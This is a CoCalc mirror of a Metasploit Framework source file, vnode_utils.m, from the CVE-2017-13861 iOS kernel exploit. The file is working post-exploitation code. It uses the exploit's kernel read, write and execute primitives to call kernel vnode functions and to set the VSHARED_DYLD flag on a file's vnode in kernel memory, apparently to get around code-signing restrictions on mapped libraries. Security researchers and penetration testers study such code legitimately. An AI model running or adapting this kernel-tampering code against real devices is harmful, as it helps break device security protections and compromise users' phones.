CoCalc -- vnode

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/external/source/exploits/CVE-2017-13861/vnode_utils.m
Views: ¹¹⁷⁷⁹

1
//
2
//  *.c
3
//  async_wake_ios
4
//
5
//  Created by George on 18/12/17.
6
//  Copyright © 2017 Ian Beer. All rights reserved.
7
//
8

9
#import <stdlib.h>
10

11
#import "kernel_utils.h"
12
#import "patchfinder64.h"
13
#import "kexecute.h"
14
#import "offsetof.h"
15

16
#include "liboffsetfinder64/getoffsets.h"
17

18
#import <Foundation/Foundation.h>
19
#define LOG(str, args...) do { NSLog(@"[*] " str "\n", ##args); } while(0)
20

21
int vnode_lookup(const char *path, int flags, uint64_t *vnode, uint64_t vfs_context) {
22
    
23
    size_t len = strlen(path) + 1;
24
    uint64_t ptr = Kernel_alloc(8);
25
    uint64_t ptr2 = Kernel_alloc(len);
26
    KernelWrite(ptr2, path, len);
27
    
28
    if (Kernel_Execute(find_symbol("_vnode_lookup") + get_kernel_slide(), ptr2, flags, ptr, vfs_context, 0, 0, 0)) {
29
        return -1;
30
    }
31
    *vnode = KernelRead_64bits(ptr);
32
    Kernel_free(ptr2, len);
33
    Kernel_free(ptr, 8);
34
    return 0;
35
}
36

37
uint64_t get_vfs_context() {
38
    return ZmFixAddr(Kernel_Execute(find_symbol("_vfs_context_current") + get_kernel_slide(), 1, 0, 0, 0, 0, 0, 0));
39
}
40

41
int vnode_put(uint64_t vnode) {
42
    return (int)Kernel_Execute(find_symbol("_vnode_put") + get_kernel_slide(), vnode, 0, 0, 0, 0, 0, 0);
43
}
44

45
uint64_t get_vnode_at_path(const char *path) {
46
    uint64_t *vnode_ptr = (uint64_t *)malloc(8);
47
    if (vnode_lookup(path, 0, vnode_ptr, get_vfs_context())) {
48
        free(vnode_ptr);
49
        return -1;
50
    }
51
    else {
52
        uint64_t vnode = *vnode_ptr;
53
        free(vnode_ptr);
54
        return vnode;
55
    }
56
}
57

58
int fix_vnode_for_mmap(const char* path) {
59

60
#define VSHARED_DYLD 0x000200
61
    
62
    uint64_t vnode = get_vnode_at_path(path);
63
    if (vnode == -1) {
64
        LOG("[-] Unable to fix mmap of path: %s\n", path);
65
        return -1;
66
    }
67
    uint32_t v_flags = KernelRead_32bits(vnode + off_v_flags);
68
    KernelWrite_32bits(vnode + off_v_flags, v_flags | VSHARED_DYLD);
69
    
70
    vnode_put(vnode);
71
    
72
    return KernelRead_32bits(vnode + off_v_flags) & VSHARED_DYLD;
73
}
74

75

76

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.